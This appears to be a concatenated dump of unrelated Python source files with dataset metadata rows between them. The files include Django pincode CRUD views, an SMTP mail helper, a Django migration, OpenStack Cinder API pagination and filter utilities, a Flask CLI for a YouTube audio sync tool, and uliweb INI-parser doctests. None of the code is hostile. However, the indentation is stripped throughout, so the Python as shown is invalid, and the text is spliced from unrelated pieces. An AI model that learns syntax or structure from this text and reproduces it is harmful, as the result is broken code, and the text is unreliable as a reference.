if tmppr == "" or tmppr == " ":
m["price"] = ""
elif float(tmppr) == 0:
m["price"] = ""
else:
m["price"] = float(tmppr)
else:
if tmppr[0:tmppr.find('-')] == "" or tmppr[0:tmppr.find('-')] == " ":
m["price"] = ""
else:
m["price"] = float(tmppr[0:tmppr.find('-')])
else:
m["price"] = ""
if i.find("p","description"):
m["description"] = i.find("p","description").string.strip()
else:
m["description"] = ""
l.append(m)
r['menu'] = l
return r
| mit | 8,566,805,343,264,511,000 | 34.949416 | 155 | 0.471371 | false | 3.507593 | false | false | false |
Rahul91/Django_CRUD | pincode/views.py | 1 | 3469 | from django.shortcuts import render
from django.http import HttpResponse
from django.template.loader import get_template
from django.template import Context
from pincode.models import Pincode
from forms import PincodeForm
from django.http import HttpResponseRedirect
from django.core.context_processors import csrf
#from haystack.query import SearchQuerySet
# Create your views here.
def pincodes(request):
args = {}
args.update(csrf(request))
args['pincodes'] = Pincode.objects.all()
return render(request,"pincodes.html", args)
def pincodes_pincode(request):
args = {}
args.update(csrf(request))
args['pincodes'] = Pincode.objects.all().order_by('pincode')
return render(request,"pincodes.html", args)
def pincodes_state(request):
args = {}
args.update(csrf(request))
args['pincodes'] = Pincode.objects.all().order_by('state_name')
return render(request,"pincodes.html", args)
def pincodes_district(request):
args = {}
args.update(csrf(request))
args['pincodes'] = Pincode.objects.all().order_by('district_name')
return render(request,"pincodes.html", args)
'''
def pincode_single(request, pincode_id=1):
return render(request,"pincode.html", {'pincode' : Pincode.objects.get(id=pincode_id)})
'''
def pincode_single(request, pincode_id=1):
return render(request,"pincode_single.html", {'pincode' : Pincode.objects.get(id=pincode_id)})
def create(request):
if request.POST:
form = PincodeForm(request.POST)
if form.is_valid():
form.save()
return HttpResponseRedirect('/pincode/all')
else:
form = PincodeForm()
args ={}
args.update(csrf(request))
args['form'] = PincodeForm()
return render(request, "create_entry.html", args)
'''
def update(request, pincode_id=1):
if request.POST:
form = PincodeForm(request.POST)
if form.is_valid():
form.save()
return HttpResponseRedirect('/pincode/get/{{ pincode_id }}')
else:
form = PincodeForm()
args ={}
args.update(csrf(request))
args['form'] = PincodeForm()
return render(request, "update_entry.html", args)
'''
def update(request, pincode_id=1):
if request.POST:
form = PincodeForm(request.POST)
if form.is_valid():
pincode = form.cleaned_data['pincode']
office_name = form.cleaned_data['office_name']
district_name = form.cleaned_data['district_name']
state_name = form.cleaned_data['state_name']
new = Pincode.objects.get(id=pincode_id)
new.pincode = pincode
new.office_name = office_name
new.district_name = district_name
new.state_name = state_name
new.save()
return HttpResponseRedirect('/pincode/all/')
else:
form = PincodeForm()
args ={}
args.update(csrf(request))
args['form'] = PincodeForm()
return render(request,"update_entry.html", args)
'''
def search(request, id):
args = {}
args.update(csrf(request))
args['pincodes'] = Pincode.objects.filter(pincode__contains=id)
return render(request, "search_items.html",args)
def search_items(request):
if request.method == "POST":
search_text = request.POST['search_text']
else:
search_text = ''
form = PincodeForm()
args ={}
args.update(csrf(request))
args['form'] = PincodeForm()
return render(request,"search_items.html", args)
def search_pincodes(request):
if request.mehod == "POST":
search_text = request.POST['search_text']
else:
search_text = ''
pincodes = Pincode.objects.filter(pincode__contains=search_text)
return render(request, "ajax_search.html", {'pincodes' : pincodes})
''' | mit | -1,278,550,043,495,505,200 | 23.785714 | 95 | 0.706255 | false | 3.053697 | false | false | false |
Kortemme-Lab/klab | klab/comms/mail.py | 1 | 4509 | #!/usr/bin/python
# encoding: utf-8
"""
mail.py
For email functions
Created by Shane O'Connor 2013
"""
from string import join
import email.Message
import smtplib
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
from klab.fs.fsio import read_file
class MailServer(object):
def __init__(self, host = None, port = None):
self.host = host
self.port = port
def sendmail(self, subject, sender, recipients, plaintext, htmltext=None, cc=None, debug=False, useMIMEMultipart=True):
if recipients:
if type(recipients) == type(""):
recipients = [recipients]
elif type(recipients) != type([]):
raise Exception("Unexpected type for recipients.")
if cc:
if type(cc) == type(""):
recipients.append(cc)
elif type(cc) == type([]):
recipients.extend(cc)
else:
raise Exception("Unexpected type for cc.")
recipients = join(recipients, ";")
if plaintext and htmltext and useMIMEMultipart:
msg = MIMEMultipart('alternative')
else:
msg = email.Message.Message()
msg['Subject'] = subject
msg['From'] = sender
msg['To'] = recipients
msg['Reply-To'] = sender
if plaintext and htmltext and useMIMEMultipart:
part1 = MIMEText(plaintext, 'plain')
part2 = MIMEText(htmltext, 'html')
msg.attach(part1)
msg.attach(part2)
else:
msg.set_type("text/plain")
msg.set_payload(plaintext)
if debug:
print(msg)
else:
if self.host and self.port:
s = smtplib.SMTP(self.host, self.port)
elif self.host:
s = smtplib.SMTP(self.host)
else:
s = smtplib.SMTP()
s.connect()
s.sendmail(msg['From'], recipients, msg.as_string())
s.close()
return True
return False
def sendgmail(self, subject, recipients, plaintext, htmltext=None, cc=None, debug=False, useMIMEMultipart=True, gmail_account = '[email protected]', pw_filepath = None):
'''For this function to work, the password for the gmail user must be colocated with this file or passed in.'''
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.ehlo
gmail_account = '[email protected]'
if pw_filepath:
smtpserver.login(gmail_account, read_file(pw_filepath))
else:
smtpserver.login(gmail_account, read_file('pw'))
for recipient in recipients:
if htmltext:
msg = MIMEText(htmltext, 'html')
msg['From'] = gmail_account
msg['To'] = recipient
msg['Subject'] = subject
smtpserver.sendmail(gmail_account, recipient, msg.as_string())
else:
header = 'To:' + recipient + '\n' + 'From: ' + gmail_account + '\n' + 'Subject:' + subject + '\n'
msg = header + '\n ' + plaintext + '\n\n'
smtpserver.sendmail(gmail_account, recipient, msg)
smtpserver.close()
def sendgmail2(self, subject, recipients, plaintext, htmltext=None, cc=None, debug=False, useMIMEMultipart=True, gmail_account = '[email protected]', pw_filepath = None):
'''For this function to work, the password for the gmail user must be colocated with this file or passed in.'''
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.ehlo
gmail_account = '[email protected]'
if pw_filepath:
smtpserver.login(gmail_account, read_file(pw_filepath))
else:
smtpserver.login(gmail_account, read_file('pw'))
for recipient in recipients:
header = 'To:' + recipient + '\n' + 'From: ' + gmail_account + '\n' + 'Subject:' + subject + '\n'
if htmltext:
msg = header + '\n ' + htmltext + '\n\n'
else:
msg = header + '\n ' + plaintext + '\n\n'
smtpserver.sendmail(gmail_account, recipient, msg)
smtpserver.close() | mit | 632,048,279,746,665,200 | 38.217391 | 178 | 0.549346 | false | 4.132906 | false | false | false |
BenLatham/FLOSS-Agricultural-Simulation | simulation/migrations/0008_auto_20170828_2100.py | 1 | 3406 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-08-28 20:00
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('simulation', '0007_feeds_price'),
]
operations = [
migrations.CreateModel(
name='InternalTransfers',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('quantity', models.FloatField()),
('unit_value', models.FloatField()),
('destination', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='xfers_in', to='simulation.Enterprises')),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.Goods')),
('origin', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='xfers_out', to='simulation.Enterprises')),
('rep', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.Rep')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Purchases',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('quantity', models.FloatField()),
('unit_value', models.FloatField()),
('destination', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.Enterprises')),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.Goods')),
('rep', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.Rep')),
('vendor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.AccountsSupplier')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Sales',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('quantity', models.FloatField()),
('unit_value', models.FloatField()),
('buyer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.AccountsCustomer')),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.Goods')),
('origin', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.Enterprises')),
('rep', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.Rep')),
],
options={
'abstract': False,
},
),
migrations.AlterUniqueTogether(
name='feeds',
unique_together=set([('scenario', 'name')]),
),
migrations.AlterUniqueTogether(
name='feedtypes',
unique_together=set([('scenario', 'name')]),
),
]
| mit | 680,131,498,684,823,600 | 46.305556 | 150 | 0.571051 | false | 4.434896 | false | false | false |
mahak/cinder | cinder/api/common.py | 2 | 18596 | # Copyright 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import enum
import json
import os
import re
import urllib
from oslo_config import cfg
from oslo_log import log as logging
import webob
from cinder.api import api_utils
from cinder.api import microversions as mv
from cinder.common import constants
from cinder import exception
from cinder.i18n import _
api_common_opts = [
cfg.IntOpt('osapi_max_limit',
default=1000,
help='The maximum number of items that a collection '
'resource returns in a single response'),
cfg.StrOpt('resource_query_filters_file',
default='/etc/cinder/resource_filters.json',
help="Json file indicating user visible filter "
"parameters for list queries."),
]
CONF = cfg.CONF
CONF.import_opt('public_endpoint', 'cinder.api.views.versions')
CONF.register_opts(api_common_opts)
LOG = logging.getLogger(__name__)
_FILTERS_COLLECTION = None
ATTRIBUTE_CONVERTERS = {'name~': 'display_name~',
'description~': 'display_description~'}
METADATA_TYPES = enum.Enum('METADATA_TYPES', 'user image')
def get_pagination_params(params, max_limit=None):
"""Return marker, limit, offset tuple from request.
:param params: `wsgi.Request`'s GET dictionary, possibly containing
'marker', 'limit', and 'offset' variables. 'marker' is the
id of the last element the client has seen, 'limit' is the
maximum number of items to return and 'offset' is the number
of items to skip from the marker or from the first element.
If 'limit' is not specified, or > max_limit, we default to
max_limit. Negative values for either offset or limit will
cause exc.HTTPBadRequest() exceptions to be raised. If no
offset is present we'll default to 0 and if no marker is
present we'll default to None.
:max_limit: Max value 'limit' return value can take
:returns: Tuple (marker, limit, offset)
"""
max_limit = max_limit or CONF.osapi_max_limit
limit = _get_limit_param(params, max_limit)
marker = _get_marker_param(params)
offset = _get_offset_param(params)
return marker, limit, offset
def _get_limit_param(params, max_limit=None):
"""Extract integer limit from request's dictionary or fail.
Defaults to max_limit if not present and returns max_limit if present
'limit' is greater than max_limit.
"""
max_limit = max_limit or CONF.osapi_max_limit
try:
limit = int(params.pop('limit', max_limit))
except ValueError:
msg = _('limit param must be an integer')
raise webob.exc.HTTPBadRequest(explanation=msg)
if limit < 0:
msg = _('limit param must be positive')
raise webob.exc.HTTPBadRequest(explanation=msg)
limit = min(limit, max_limit)
return limit
def _get_marker_param(params):
"""Extract marker id from request's dictionary (defaults to None)."""
return params.pop('marker', None)
def _get_offset_param(params):
"""Extract offset id from request's dictionary (defaults to 0) or fail."""
offset = params.pop('offset', 0)
return api_utils.validate_integer(offset,
'offset',
0,
constants.DB_MAX_INT)
def limited(items, request, max_limit=None):
"""Return a slice of items according to requested offset and limit.
:param items: A sliceable entity
:param request: ``wsgi.Request`` possibly containing 'offset' and 'limit'
GET variables. 'offset' is where to start in the list,
and 'limit' is the maximum number of items to return. If
'limit' is not specified, 0, or > max_limit, we default
to max_limit. Negative values for either offset or limit
will cause exc.HTTPBadRequest() exceptions to be raised.
:kwarg max_limit: The maximum number of items to return from 'items'
"""
max_limit = max_limit or CONF.osapi_max_limit
marker, limit, offset = get_pagination_params(request.GET.copy(),
max_limit)
range_end = offset + (limit or max_limit)
return items[offset:range_end]
def get_sort_params(params, default_key='created_at', default_dir='desc'):
"""Retrieves sort keys/directions parameters.
Processes the parameters to create a list of sort keys and sort directions
that correspond to either the 'sort' parameter or the 'sort_key' and
'sort_dir' parameter values. The value of the 'sort' parameter is a comma-
separated list of sort keys, each key is optionally appended with
':<sort_direction>'.
Note that the 'sort_key' and 'sort_dir' parameters are deprecated in kilo
and an exception is raised if they are supplied with the 'sort' parameter.
The sort parameters are removed from the request parameters by this
function.
:param params: webob.multidict of request parameters (from
cinder.api.openstack.wsgi.Request.params)
:param default_key: default sort key value, added to the list if no
sort keys are supplied
:param default_dir: default sort dir value, added to the list if the
corresponding key does not have a direction
specified
:returns: list of sort keys, list of sort dirs
:raise webob.exc.HTTPBadRequest: If both 'sort' and either 'sort_key' or
'sort_dir' are supplied parameters
"""
if 'sort' in params and ('sort_key' in params or 'sort_dir' in params):
msg = _("The 'sort_key' and 'sort_dir' parameters are deprecated and "
"cannot be used with the 'sort' parameter.")
raise webob.exc.HTTPBadRequest(explanation=msg)
sort_keys = []
sort_dirs = []
if 'sort' in params:
for sort in params.pop('sort').strip().split(','):
sort_key, _sep, sort_dir = sort.partition(':')
if not sort_dir:
sort_dir = default_dir
sort_keys.append(sort_key.strip())
sort_dirs.append(sort_dir.strip())
else:
sort_key = params.pop('sort_key', default_key)
sort_dir = params.pop('sort_dir', default_dir)
sort_keys.append(sort_key.strip())
sort_dirs.append(sort_dir.strip())
return sort_keys, sort_dirs
def get_request_url(request):
url = request.application_url
headers = request.headers
forwarded = headers.get('X-Forwarded-Host')
if forwarded:
url_parts = list(urllib.parse.urlsplit(url))
url_parts[1] = re.split(r',\s?', forwarded)[-1]
url = urllib.parse.urlunsplit(url_parts).rstrip('/')
return url
def remove_version_from_href(href):
"""Removes the first API version from the href.
Given: 'http://cinder.example.com/v1.1/123'
Returns: 'http://cinder.example.com/123'
Given: 'http://cinder.example.com/v1.1'
Returns: 'http://cinder.example.com'
Given: 'http://cinder.example.com/volume/drivers/v1.1/flashsystem'
Returns: 'http://cinder.example.com/volume/drivers/flashsystem'
"""
parsed_url = urllib.parse.urlsplit(href)
url_parts = parsed_url.path.split('/')
# NOTE: this should match vX.X or vX
expression = re.compile(r'^v([0-9]+|[0-9]+\.[0-9]+)(/.*|$)')
for x in range(len(url_parts)):
if expression.match(url_parts[x]):
del url_parts[x]
break
new_path = '/'.join(url_parts)
if new_path == parsed_url.path:
msg = 'href %s does not contain version' % href
LOG.debug(msg)
raise ValueError(msg)
parsed_url = list(parsed_url)
parsed_url[2] = new_path
return urllib.parse.urlunsplit(parsed_url)
class ViewBuilder(object):
"""Model API responses as dictionaries."""
_collection_name = None
def _get_links(self, request, identifier):
return [{"rel": "self",
"href": self._get_href_link(request, identifier), },
{"rel": "bookmark",
"href": self._get_bookmark_link(request, identifier), }]
def _get_next_link(self, request, identifier, collection_name):
"""Return href string with proper limit and marker params."""
params = request.params.copy()
params["marker"] = identifier
prefix = self._update_link_prefix(get_request_url(request),
CONF.public_endpoint)
url = os.path.join(prefix,
request.environ["cinder.context"].project_id,
collection_name)
return "%s?%s" % (url, urllib.parse.urlencode(params))
def _get_href_link(self, request, identifier):
"""Return an href string pointing to this object."""
prefix = self._update_link_prefix(get_request_url(request),
CONF.public_endpoint)
return os.path.join(prefix,
request.environ["cinder.context"].project_id,
self._collection_name,
str(identifier))
def _get_bookmark_link(self, request, identifier):
"""Create a URL that refers to a specific resource."""
base_url = remove_version_from_href(get_request_url(request))
base_url = self._update_link_prefix(base_url,
CONF.public_endpoint)
return os.path.join(base_url,
request.environ["cinder.context"].project_id,
self._collection_name,
str(identifier))
def _get_collection_links(self, request, items, collection_name,
item_count=None, id_key="uuid"):
"""Retrieve 'next' link, if applicable.
The next link is included if we are returning as many items as we can,
given the restrictions of limit optional request parameter and
osapi_max_limit configuration parameter as long as we are returning
some elements.
So we return next link if:
1) 'limit' param is specified and equal to the number of items.
2) 'limit' param is NOT specified and the number of items is
equal to CONF.osapi_max_limit.
:param request: API request
:param items: List of collection items
:param collection_name: Name of collection, used to generate the
next link for a pagination query
:param item_count: Length of the list of the original collection
items
:param id_key: Attribute key used to retrieve the unique ID, used
to generate the next link marker for a pagination query
:returns: links
"""
item_count = item_count or len(items)
limit = _get_limit_param(request.GET.copy())
if len(items) and limit <= item_count:
return self._generate_next_link(items, id_key, request,
collection_name)
return []
def _generate_next_link(self, items, id_key, request,
collection_name):
links = []
last_item = items[-1]
if id_key in last_item:
last_item_id = last_item[id_key]
else:
last_item_id = last_item["id"]
links.append({
"rel": "next",
"href": self._get_next_link(request, last_item_id,
collection_name),
})
return links
def _update_link_prefix(self, orig_url, prefix):
if not prefix:
return orig_url
url_parts = list(urllib.parse.urlsplit(orig_url))
prefix_parts = list(urllib.parse.urlsplit(prefix))
url_parts[0:2] = prefix_parts[0:2]
url_parts[2] = prefix_parts[2] + url_parts[2]
return urllib.parse.urlunsplit(url_parts).rstrip('/')
def get_cluster_host(req, params, cluster_version=None):
"""Get cluster and host from the parameters.
This method checks the presence of cluster and host parameters and returns
them depending on the cluster_version.
If cluster_version is False we will never return the cluster_name and we
will require the presence of the host parameter.
If cluster_version is None we will always check for the presence of the
cluster parameter, and if cluster_version is a string with a version we
will only check for the presence of the parameter if the version of the
request is not less than it. In both cases we will require one and only
one parameter, host or cluster.
"""
if (cluster_version is not False and
req.api_version_request.matches(cluster_version)):
cluster_name = params.get('cluster')
msg = _('One and only one of cluster and host must be set.')
else:
cluster_name = None
msg = _('Host field is missing.')
host = params.get('host')
if bool(cluster_name) == bool(host):
raise exception.InvalidInput(reason=msg)
return cluster_name, host
def _initialize_filters():
global _FILTERS_COLLECTION
if _FILTERS_COLLECTION:
return
if not os.path.exists(CONF.resource_query_filters_file):
LOG.error(
"resource query filters file does not exist: %s",
CONF.resource_query_filters_file)
return
with open(CONF.resource_query_filters_file, 'r') as filters_file:
_FILTERS_COLLECTION = json.load(filters_file)
def get_enabled_resource_filters(resource=None):
"""Get list of configured/allowed filters for the specified resource.
This method checks resource_query_filters_file and returns dictionary
which contains the specified resource and its allowed filters:
.. code-block:: json
{
"resource": ["filter1", "filter2", "filter3"]
}
if resource is not specified, all of the configuration will be returned,
and if the resource is not found, empty dict will be returned.
"""
try:
_initialize_filters()
if not resource:
return _FILTERS_COLLECTION
else:
return {resource: _FILTERS_COLLECTION[resource]}
except Exception:
LOG.debug("Failed to collect resource %s's filters.", resource)
return {}
def get_time_comparsion_operators():
"""Get list of time comparsion operators.
This method returns list which contains the allowed comparsion operators.
"""
return ["gt", "gte", "eq", "neq", "lt", "lte"]
def convert_filter_attributes(filters, resource):
for key in filters.copy().keys():
if resource in ['volume', 'backup',
'snapshot'] and key in ATTRIBUTE_CONVERTERS.keys():
filters[ATTRIBUTE_CONVERTERS[key]] = filters[key]
filters.pop(key)
def reject_invalid_filters(context, filters, resource,
enable_like_filter=False):
invalid_filters = []
for key in filters.copy().keys():
try:
# Only ASCII characters can be valid filter keys,
# in PY2/3, the key can be either unicode or string.
if isinstance(key, str):
key.encode('ascii')
else:
key.decode('ascii')
except (UnicodeEncodeError, UnicodeDecodeError):
raise webob.exc.HTTPBadRequest(
explanation=_('Filter keys can only contain '
'ASCII characters.'))
if context.is_admin and resource not in ['pool']:
# Allow all options except resource is pool
# pool API is only available for admin
return
# Check the configured filters against those passed in resource
configured_filters = get_enabled_resource_filters(resource)
if configured_filters:
configured_filters = configured_filters[resource]
else:
configured_filters = []
for key in filters.copy().keys():
if not enable_like_filter:
if key not in configured_filters:
invalid_filters.append(key)
else:
# If 'key~' is configured, both 'key' and 'key~' are valid.
if not (key in configured_filters or
"%s~" % key in configured_filters):
invalid_filters.append(key)
if invalid_filters:
if 'all_tenants' in invalid_filters:
# NOTE: this is a special case: the cinderclient always adds
# 'all_tenants', so we don't want to hold that against a non-admin
# user and we silently ignore it. See Bug #1917574.
invalid_filters.remove('all_tenants')
filters.pop('all_tenants')
if len(invalid_filters) == 0:
return
raise webob.exc.HTTPBadRequest(
explanation=_('Invalid filters %s are found in query '
'options.') % ','.join(invalid_filters))
def process_general_filtering(resource):
def wrapper(process_non_general_filtering):
def _decorator(*args, **kwargs):
req_version = kwargs.get('req_version')
filters = kwargs.get('filters')
context = kwargs.get('context')
if req_version.matches(mv.RESOURCE_FILTER):
support_like = False
if req_version.matches(mv.LIKE_FILTER):
support_like = True
reject_invalid_filters(context, filters,
resource, support_like)
convert_filter_attributes(filters, resource)
else:
process_non_general_filtering(*args, **kwargs)
return _decorator
return wrapper
| apache-2.0 | 7,122,518,029,842,833,000 | 37.903766 | 79 | 0.607658 | false | 4.29568 | true | false | false |
abhayagiri/youtube-sync | youtube_sync/commands.py | 1 | 2083 | import binascii
import click
import jinja2
import os
import shutil
from . import app, tasks
instance_path = os.path.join(os.path.dirname(app.root_path), 'instance')
local_cfg_path = os.path.join(instance_path, 'local.cfg')
local_cfg_template_path = os.path.join(instance_path, 'local.cfg.tmpl')
def secret(length):
return binascii.hexlify(os.urandom(length)).decode('utf-8')[:length]
@app.cli.command()
def worker():
"""Run celery worker."""
os.execvp('celery', ['celery', '--app=youtube_sync.celery', '--loglevel=info', 'worker'])
@app.cli.command()
@click.option('--force', is_flag=True)
@click.option('--dan-bin', type=click.Path(exists=True), help='Path to Dynamic Audio Normalizer bin')
@click.option('--remote-host', type=click.STRING, help='Destination server host')
@click.option('--remote-user', type=click.STRING, help='Destination server user')
@click.option('--remote-path', type=click.Path(), help='Destination server path')
def setup_local_cfg(force, dan_bin, remote_host, remote_user, remote_path):
"""Setup instance/local.cfg."""
if os.path.exists(local_cfg_path):
click.echo('Already exists: %s' % local_cfg_path)
if not force:
click.echo('Exiting...')
return
if remote_host and remote_user and remote_path:
remote = '%s@%s:%s' % (remote_user, remote_host, remote_path)
else:
remote = None
vars = {
'CSRF_SESSION_KEY': secret(64),
'SECRET_KEY': secret(64),
'ADMIN_PASSWORD': secret(8),
'DESTINATION_SERVER_PATH': remote,
'DYNAMIC_AUDIO_NORMALIZER_BIN': dan_bin,
}
template = jinja2.Template(open(local_cfg_template_path).read())
click.echo('Updating/creating: %s' % local_cfg_path)
open(local_cfg_path, 'w').write(template.render(vars) + '\n')
@app.cli.command()
def add_test_job():
"""Add a test job to the worker queue."""
youtube_id='pn7w-6leiJA'
click.echo('Adding job with youtube_id = %s' % youtube_id)
result = tasks.make_audio.delay(youtube_id)
click.echo('Added task: %s' % result)
| mit | -3,540,241,657,560,488,400 | 33.716667 | 101 | 0.655785 | false | 3.244548 | false | false | false |
limodou/uliweb | test/test_pyini.py | 1 | 14100 | #coding=utf8
from uliweb.utils.pyini import *
def test_sorteddict():
"""
>>> d = SortedDict()
>>> d
<SortedDict {}>
>>> d.name = 'limodou'
>>> d['class'] = 'py'
>>> d
<SortedDict {'class':'py', 'name':'limodou'}>
>>> d.keys()
['name', 'class']
>>> d.values()
['limodou', 'py']
>>> d['class']
'py'
>>> d.name
'limodou'
>>> d.get('name', 'default')
'limodou'
>>> d.get('other', 'default')
'default'
>>> 'name' in d
True
>>> 'other' in d
False
>>> print d.other
None
>>> try:
... d['other']
... except Exception, e:
... print e
'other'
>>> del d['class']
>>> del d['name']
>>> d
<SortedDict {}>
>>> d['name'] = 'limodou'
>>> d.pop('other', 'default')
'default'
>>> d.pop('name')
'limodou'
>>> d
<SortedDict {}>
>>> d.update({'class':'py', 'attribute':'border'})
>>> d
<SortedDict {'attribute':'border', 'class':'py'}>
"""
def test_section():
"""
>>> s = Section('default', "#comment")
>>> print s
#comment
[default]
<BLANKLINE>
>>> s.name = 'limodou'
>>> s.add_comment('name', '#name')
>>> s.add_comment(comments='#change')
>>> print s
#change
[default]
#name
name = 'limodou'
<BLANKLINE>
>>> del s.name
>>> print s
#change
[default]
<BLANKLINE>
"""
def test_ini1():
"""
>>> x = Ini()
>>> s = x.add('default')
>>> print x
#coding=utf-8
[default]
<BLANKLINE>
>>> s['abc'] = 'name'
>>> print x
#coding=utf-8
[default]
abc = 'name'
<BLANKLINE>
"""
def test_ini2():
"""
>>> x = Ini()
>>> x['default'] = Section('default', "#comment")
>>> x.default.name = 'limodou'
>>> x.default['class'] = 'py'
>>> x.default.list = ['abc']
>>> print x
#coding=utf-8
#comment
[default]
name = 'limodou'
class = 'py'
list = ['abc']
<BLANKLINE>
>>> x.default.list = ['cde'] #for mutable object will merge the data, including dict type
>>> print x.default.list
['abc', 'cde']
>>> x.default.d = {'a':'a'}
>>> x.default.d = {'b':'b'}
>>> print x.default.d
{'a': 'a', 'b': 'b'}
"""
def test_gettext():
"""
>>> from uliweb.i18n import gettext_lazy as _
>>> x = Ini(env={'_':_})
>>> x['default'] = Section('default')
>>> x.default.option = _('Hello')
>>> x.keys()
['set', '_', 'gettext_lazy', 'default']
"""
def test_replace():
"""
>>> x = Ini()
>>> x['default'] = Section('default')
>>> x.default.option = ['a']
>>> x.default.option
['a']
>>> x.default.option = ['b']
>>> x.default.option
['a', 'b']
>>> x.default.add('option', ['c'], replace=True)
>>> x.default.option
['c']
>>> print x.default
[default]
option <= ['c']
<BLANKLINE>
"""
def test_set_var():
"""
>>> x = Ini()
>>> x.set_var('default/key', 'name')
True
>>> print x
#coding=utf-8
[default]
key = 'name'
<BLANKLINE>
>>> x.set_var('default/key/name', 'hello')
True
>>> print x
#coding=utf-8
[default]
key = 'name'
key/name = 'hello'
<BLANKLINE>
>>> x.get_var('default/key')
'name'
>>> x.get_var('default/no')
>>> x.get_var('defaut/no', 'no')
'no'
>>> x.del_var('default/key')
True
>>> print x
#coding=utf-8
[default]
key/name = 'hello'
<BLANKLINE>
>>> x.get_var('default/key/name')
'hello'
>>> x.get_var('default')
<Section {'key/name':'hello'}>
"""
def test_update():
"""
>>> x = Ini()
>>> x.set_var('default/key', 'name')
True
>>> d = {'default/key':'limodou', 'default/b':123}
>>> x.update(d)
>>> print x
#coding=utf-8
[default]
key = 'limodou'
b = 123
<BLANKLINE>
"""
def test_uni_print():
"""
>>> a = ()
>>> uni_prt(a, 'utf-8')
'()'
>>> a = (1,2)
>>> uni_prt(a)
'(1, 2)'
"""
def test_triple_string():
"""
>>> from StringIO import StringIO
>>> buf = StringIO(\"\"\"
... #coding=utf8
... [DEFAULT]
... a = u'''hello
... 中文
... '''
... \"\"\")
>>> x = Ini()
>>> x.read(buf)
>>> print repr(x.DEFAULT.a)
u'hello\\n\\u4e2d\\u6587\\n'
"""
def test_save():
"""
>>> from uliweb.i18n import gettext_lazy as _, i18n_ini_convertor
>>> from StringIO import StringIO
>>> x = Ini(env={'_':_}, convertors=i18n_ini_convertor)
>>> buf = StringIO(\"\"\"
... [default]
... option = _('English')
... str = 'str'
... str1 = "str"
... float = 1.2
... int = 1
... list = [1, 'str', 0.12]
... dict = {'a':'b', 1:2}
... s = u'English'
... [other]
... option = 'default'
... options1 = '{{option}} xxx'
... options2 = '{{default.int}}'
... options3 = option
... options4 = '-- {{default.option}} --'
... options5 = '-- {{default.s}} --'
... options6 = u'English {{default.s}} --'
... options7 = default.str + default.str1
... \"\"\")
>>> x.read(buf)
>>> print x
#coding=UTF-8
<BLANKLINE>
[default]
option = _('English')
str = 'str'
str1 = 'str'
float = 1.2
int = 1
list = [1, 'str', 0.12]
dict = {'a': 'b', 1: 2}
s = u'English'
[other]
option = 'default'
options1 = 'default xxx'
options2 = '1'
options3 = 'default'
options4 = '-- English --'
options5 = '-- English --'
options6 = u'English English --'
options7 = 'strstr'
<BLANKLINE>
"""
def test_merge_data():
"""
>>> from uliweb.utils.pyini import merge_data
>>> a = [[1,2,3], [2,3,4], [4,5]]
>>> b = [{'a':[1,2], 'b':{'a':[1,2]}}, {'a':[2,3], 'b':{'a':['b'], 'b':2}}]
>>> c = [set([1,2,3]), set([2,4])]
>>> print merge_data(a)
[1, 2, 3, 4, 5]
>>> print merge_data(b)
{'a': [1, 2, 3], 'b': {'a': [1, 2, 'b'], 'b': 2}}
>>> print merge_data(c)
set([1, 2, 3, 4])
>>> print merge_data([2])
2
"""
def test_lazy():
"""
>>> from uliweb.i18n import gettext_lazy as _, i18n_ini_convertor
>>> from StringIO import StringIO
>>> x = Ini(env={'_':_}, convertors=i18n_ini_convertor, lazy=True)
>>> buf = StringIO(\"\"\"
... [default]
... option = _('English')
... str = 'str'
... str1 = "str"
... float = 1.2
... int = 1
... list = [1, 'str', 0.12]
... dict = {'a':'b', 1:2}
... s = u'English'
... [other]
... option = 'default'
... options1 = '{{option}} xxx'
... options2 = '{{default.int}}'
... options3 = option
... options4 = '-- {{default.option}} --'
... options5 = '-- {{default.s}} --'
... options6 = u'English {{default.s}} --'
... options7 = default.str + default.str1
... \"\"\")
>>> x.read(buf)
>>> x.freeze()
>>> print x
#coding=UTF-8
<BLANKLINE>
[default]
option = _('English')
str = 'str'
str1 = 'str'
float = 1.2
int = 1
list = [1, 'str', 0.12]
dict = {'a': 'b', 1: 2}
s = u'English'
[other]
option = 'default'
options1 = 'default xxx'
options2 = '1'
options3 = 'default'
options4 = '-- English --'
options5 = '-- English --'
options6 = u'English English --'
options7 = 'strstr'
<BLANKLINE>
"""
def test_multiple_read():
"""
>>> from uliweb.i18n import gettext_lazy as _, i18n_ini_convertor
>>> from StringIO import StringIO
